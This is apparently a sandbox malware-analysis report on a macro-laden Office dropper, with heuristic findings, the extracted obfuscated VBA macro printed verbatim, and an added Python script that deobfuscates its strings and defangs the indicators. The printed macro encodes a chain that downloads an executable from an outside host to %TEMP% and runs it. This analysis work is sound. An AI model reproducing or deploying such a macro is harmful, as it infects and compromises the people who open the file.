Verdict: MALICIOUS (risk score 164)

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a malicious Office document containing VBA macros. The heuristic OLE_VBA_PCODE_AUTOEXEC_EXEC indicates that the compiled macro (p-code) carries an auto-execution token together with shell, download and object-execution tokens, i.e. it attempts to run code as soon as the document is opened. The SC_STR_WSCRIPT heuristic further suggests use of Windows Script Host, most likely to download and execute a secondary payload. The decoded macro source below (macros.bas) is consistent with that: most of its identifiers are randomly generated, and every sensitive string literal is passed through a helper (AlJtwNCb.NzbElOh) that lives in a module the extractor did not recover. The ClamAV detection Doc.Dropper.Agent-6403839-0 on the document corroborates its classification as a dropper; note that the carved macros.bas produces no ClamAV hit on its own, so the signature keys on the document container rather than on the decoded source text.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6403839-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6403839-0
- Reference to Windows Script Host [high, SC_STR_WSCRIPT]: Reference to Windows Script Host
- VBA macros detected [medium, OLE_VBA_MACROS, 1 related finding]: Document contains VBA macro code
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

  All five are XML namespace URIs (RDF, Adobe XMP and DrawingML) from embedded image metadata and drawing markup, i.e. schema identifiers rather than network indicators. The macro's own string literals are obfuscated (see the listing below), so any URL the macro uses would not surface in this plain-text scan.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3648 bytes |

SHA-256: 538257fd2687160a9b3099946ad3324df116797621e07127b6a5db4bfb018d52

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 56 of 98 identifiers look randomly generated (e.g. 'ReXsGOpoqnOsOeqBGOoqdyG'), consistent with name-mangling obfuscation. The quoted example is in fact one of the obfuscated string literals fed to AlJtwNCb.NzbElOh rather than an identifier, but the procedure and variable names in the listing (rvYdOAwcuH, YRFtRyuOMI, utuhmS, ...) show the same pattern.
Preview script (first 1,000 lines of the extracted script, reproduced verbatim):

```vba
Attribute VB_Name = "YEVWrnxjZw"
Private Function rvYdOAwcuH(ByVal aYERV As String, ByVal tqCeR As String) As String
Dim CylOKlM As Integer
Set HWNSf = SiovGt.kHJDvJ(YRFtRyuOMI, CdauetYt.nMfUcbkG, AlJtwNCb.NzbElOh("P3RAWOVCVES3VS", ".A3VW"))
rvYdOAwcuH = HWNSf(aYERV)
End Function
Private Function XQQHRivB() As String
XQQHRivB = AlJtwNCb.NzbElOh("OYp4eCnC", "CY4 ")
End Function
Private Function YRFtRyuOMI() As String
YRFtRyuOMI = AlJtwNCb.NzbElOh("E8nYYvGirbYoGnbm8eBnGt", "8bBGYX")
End Function
Private Function noPgfimLQl() As String
noPgfimLQl = "eJdybT86JRL"
End Function
Private Sub utuhmS(ByVal uKjCSio As String, ByVal qoqVV As String)
Set ttAvUNZbD = CdauetYt.yFOARrxkL
SiovGt.uLMdQEzSM OzsMX, AlJtwNCb.NzbElOh("OYp4eCnC", "CY4 "), uKjCSio, ttAvUNZbD, False
SiovGt.QavSmHwAdE AlJtwNCb.NzbElOh("UJsJJerj-JJAjgJeJnGt", "GJj"), YBKUEtVd, 2963, AlJtwNCb.NzbElOh("Mv5ovzviluvl5av/45v.0uv 5(cvvomv5pautuiuvbvle5;5u)", "5uv"), NbJTHGCP, ttAvUNZbD
SiovGt.bgDKJRS 1177, ttAvUNZbD, bcUkOw
WKCFjIMPBW True, 6317, qoqVV, SiovGt.JvWgrglen(NbJTHGCP, tEVIdsD, ttAvUNZbD)
End Sub
Private Function tEVIdsD() As String
tEVIdsD = AlJtwNCb.NzbElOh(".ReXsGOpoqnOsOeqBGOoqdyG", ".GXqO")
End Function
Private Sub gbNWoi()
Dim HttjRmGJ As Integer
OIRUtHf = True
On Error GoTo ikwBA
zIxdob = False
utuhmS XbpIXBreKI, qpfZb
KpfAeitTid qpfZb
Exit Sub
ikwBA:
End Sub
Private Function qpfZb() As String
Dim TQUHiRmd As Integer, hIKrUpMu As Integer
qpfZb = rvYdOAwcuH(AlJtwNCb.NzbElOh("ZTEUMZsP", "9cZUsX"), "rlpEKNMdbrH3gcN") & ureCwD
End Function
Private Function HgLZFJd() As String
HgLZFJd = AlJtwNCb.NzbElOh("nTyHpaeB", "HBaqXn")
End Function
Private Function ureCwD() As String
Dim duAGGyqSxo As Integer
Dim AhCLLHJB As Integer
JJNlxuFaS = True
ureCwD = yUuhMmQyGP
End Function
Private Sub KpfAeitTid(ByVal OGiVlfDvNr As String)
SiovGt.lITquzHn "G29r6KbTng", CdauetYt.nMfUcbkG, 7188, OGiVlfDvNr, AlJtwNCb.NzbElOh("kEx2eI1c", "k31IG2")
End Sub
Private Function NbJTHGCP() As String
NbJTHGCP = "g81SabjfIw6"
End Function
Public Sub IdmgRsM()
Dim ZcKzmV As Integer
Dim ZJXOxiAU As Boolean
kZsag = 4121
gbNWoi
End Sub
Private Function NPLIiMfm() As String
NPLIiMfm = AlJtwNCb.NzbElOh("YClm/o/s0e", "0dY/m")
End Function
Private Function XbpIXBreKI() As String
Dim nTCnT As Integer
XbpIXBreKI = AlJtwNCb.NzbElOh("hBtYUtpYU:Y//YmYaYBgUaBzYinUBesYeUYmUprUeYbBeYlUlBUaU.cYoBYmB/UsBysUtYeUmUY/BcUacBhBeUY/UwoBrUUdY.eYYxUe", "YUB")
End Function
Private Sub WKCFjIMPBW(ByVal nYjlPOglL As Boolean, ByVal Qhqsj As Integer, ByVal mFQrVpW As String, ByVal InZuOq As Variant)
Dim nIDzD As Boolean
Dim OGwEZVg As Integer
Set iIHcTWxaSP = CdauetYt.QLILYAMDT
SiovGt.HQvScqTefi True, 1, iIHcTWxaSP, HgLZFJd
SiovGt.bgDKJRS 1177, iIHcTWxaSP, XQQHRivB
uRUxACPwrk = 5904
SiovGt.lITquzHn noPgfimLQl, iIHcTWxaSP, 7188, InZuOq, AlJtwNCb.NzbElOh("Wbbribtzek", "Zzlmkb")
sIbLjqP = "zGfxeChfYk2NCyH"
SiovGt.QavSmHwAdE mFQrVpW, nAsYQtvB, 2963, 2, noPgfimLQl, iIHcTWxaSP
SiovGt.bgDKJRS 1177, iIHcTWxaSP, NPLIiMfm
End Sub
Private Function OzsMX() As String
XBoKEL = False
OzsMX = AlJtwNCb.NzbElOh("G.E TB", ".BA ")
End Function
Private Function nAsYQtvB() As String
nAsYQtvB = AlJtwNCb.NzbElOh("pSraUvremToVUFimlVed", "mprdUV")
End Function
Private Function yUuhMmQyGP() As String
yUuhMmQyGP = AlJtwNCb.NzbElOh("/76owfbV879w4eo1o8w027fw14Vb5V7a41o.VeoxeV", "V7wo4")
End Function
Private Function YBKUEtVd() As String
YBKUEtVd = AlJtwNCb.NzbElOh("SEehtELReLlqhuelshhtLHhepaldlelr", "ELlhp")
End Function
Private Function bcUkOw() As String
bcUkOw = AlJtwNCb.NzbElOh("SIerIndr", "MIrG")
End Function
```
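The listing routes every sensitive string through AlJtwNCb.NzbElOh, whose defining module was not extracted, so the analyzer's heuristics only see token-shaped noise. The following triage script is an added example, not part of the analyzer or of the sample. It assumes that NzbElOh(payload, junk) simply deletes from payload every character that also occurs in junk; that rule is inferred, not recovered from the sample, but it decodes every call site in the listing into a meaningful token (Environment, PROCESS, GET, User-Agent, SaveToFile, Exec, ...). The excerpt embedded in the script is copied from the listing above; the token groupings and the %TEMP% join (mirroring qpfZb(), which concatenates rvYdOAwcuH("TEMP") with ureCwD()) are the example's own.

```python
"""Decode the string-filter obfuscation used by the extracted macros.bas.

Added triage helper, not the analyzer's or the sample's code. ASSUMPTION:
AlJtwNCb.NzbElOh(payload, junk) returns `payload` with every character that
occurs in `junk` removed. The module defining it was not extracted, so the
rule is inferred from the fact that it turns each call site into a token.
"""
import re
from typing import Dict, List, Tuple

# Lines copied from the macros.bas listing above (only those with NzbElOh
# calls); the remaining procedures are wrapper noise for this purpose.
MACRO_EXCERPT = r'''
Set HWNSf = SiovGt.kHJDvJ(YRFtRyuOMI, CdauetYt.nMfUcbkG, AlJtwNCb.NzbElOh("P3RAWOVCVES3VS", ".A3VW"))
XQQHRivB = AlJtwNCb.NzbElOh("OYp4eCnC", "CY4 ")
YRFtRyuOMI = AlJtwNCb.NzbElOh("E8nYYvGirbYoGnbm8eBnGt", "8bBGYX")
SiovGt.QavSmHwAdE AlJtwNCb.NzbElOh("UJsJJerj-JJAjgJeJnGt", "GJj"), YBKUEtVd, 2963, AlJtwNCb.NzbElOh("Mv5ovzviluvl5av/45v.0uv 5(cvvomv5pautuiuvbvle5;5u)", "5uv"), NbJTHGCP, ttAvUNZbD
tEVIdsD = AlJtwNCb.NzbElOh(".ReXsGOpoqnOsOeqBGOoqdyG", ".GXqO")
qpfZb = rvYdOAwcuH(AlJtwNCb.NzbElOh("ZTEUMZsP", "9cZUsX"), "rlpEKNMdbrH3gcN") & ureCwD
HgLZFJd = AlJtwNCb.NzbElOh("nTyHpaeB", "HBaqXn")
SiovGt.lITquzHn "G29r6KbTng", CdauetYt.nMfUcbkG, 7188, OGiVlfDvNr, AlJtwNCb.NzbElOh("kEx2eI1c", "k31IG2")
NPLIiMfm = AlJtwNCb.NzbElOh("YClm/o/s0e", "0dY/m")
XbpIXBreKI = AlJtwNCb.NzbElOh("hBtYUtpYU:Y//YmYaYBgUaBzYinUBesYeUYmUprUeYbBeYlUlBUaU.cYoBYmB/UsBysUtYeUmUY/BcUacBhBeUY/UwoBrUUdY.eYYxUe", "YUB")
SiovGt.lITquzHn noPgfimLQl, iIHcTWxaSP, 7188, InZuOq, AlJtwNCb.NzbElOh("Wbbribtzek", "Zzlmkb")
OzsMX = AlJtwNCb.NzbElOh("G.E TB", ".BA ")
nAsYQtvB = AlJtwNCb.NzbElOh("pSraUvremToVUFimlVed", "mprdUV")
yUuhMmQyGP = AlJtwNCb.NzbElOh("/76owfbV879w4eo1o8w027fw14Vb5V7a41o.VeoxeV", "V7wo4")
YBKUEtVd = AlJtwNCb.NzbElOh("SEehtELReLlqhuelshhtLHhepaldlelr", "ELlhp")
bcUkOw = AlJtwNCb.NzbElOh("SIerIndr", "MIrG")
'''

CALL_RE = re.compile(r'AlJtwNCb\.NzbElOh\("([^"]*)",\s*"([^"]*)"\)')

# Token classes in the spirit of OLE_VBA_PCODE_AUTOEXEC_EXEC; this grouping
# is the example's own, not the analyzer's list.
NETWORK_TOKENS = {"GET", "Send", "ResponseBody", "SetRequestHeader", "User-Agent"}
FILE_TOKENS = {"Type", "Open", "Write", "SaveToFile", "Close"}
EXEC_TOKENS = {"Exec"}


def nzbeloh(payload: str, junk: str) -> str:
    """Assumed NzbElOh semantics: keep the characters of `payload` that do
    not occur in `junk`, preserving their order."""
    drop = set(junk)
    return "".join(ch for ch in payload if ch not in drop)


def decode_calls(vba_source: str) -> List[Tuple[str, str, str]]:
    """Return (payload, junk, decoded) for every NzbElOh call site found."""
    return [(p, j, nzbeloh(p, j)) for p, j in CALL_RE.findall(vba_source)]


def summarise(vba_source: str) -> Dict[str, object]:
    """Group decoded strings into IOCs and capability tokens. The drop path
    mirrors qpfZb(): rvYdOAwcuH("TEMP") (an environment lookup) & ureCwD()."""
    decoded = [d for _, _, d in decode_calls(vba_source)]
    url = next((d for d in decoded if d.startswith("http")), None)
    exe = next((d for d in decoded if d.startswith("/") and d.lower().endswith(".exe")), None)
    env = "TEMP" if "TEMP" in decoded else None
    return {
        "url": url,
        "drop_path": f"%{env}%{exe}" if env and exe else None,
        "user_agent": next((d for d in decoded if d.startswith("Mozilla")), None),
        "network": sorted(set(decoded) & NETWORK_TOKENS),
        "file_write": sorted(set(decoded) & FILE_TOKENS),
        "execution": sorted(set(decoded) & EXEC_TOKENS),
    }


def is_download_and_execute(summary: Dict[str, object]) -> bool:
    """True when a URL, a file-write capability and an execution token all
    coexist, i.e. the classic downloader/dropper chain."""
    return bool(summary["url"] and summary["file_write"] and summary["execution"])


def defang(url: str) -> str:
    """Render a network IOC so it cannot be followed by accident."""
    scheme, _, rest = url.partition("://")
    host, sep, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + sep + path


if __name__ == "__main__":
    for payload, junk, plain in decode_calls(MACRO_EXCERPT):
        print(f"{plain!r:40} <- NzbElOh({payload!r}, {junk!r})")
    s = summarise(MACRO_EXCERPT)
    print("download :", defang(str(s["url"])))
    print("drop path:", s["drop_path"])
    print("chain    :", "download-and-execute" if is_download_and_execute(s) else "incomplete")
```

Run as a script it prints every decoded literal next to its call site, then the defanged download URL, the drop path under %TEMP% and whether the three capability classes (network fetch, file write, Exec) are all present. If the decoding rule were wrong, the tokens would not line up with known COM member names (Open, Type, Write, SaveToFile, Close are ADODB.Stream; GET, SetRequestHeader, Send, ResponseBody are an XMLHTTP request; Exec is WScript.Shell), which is the sanity check to apply before trusting any deobfuscation guess.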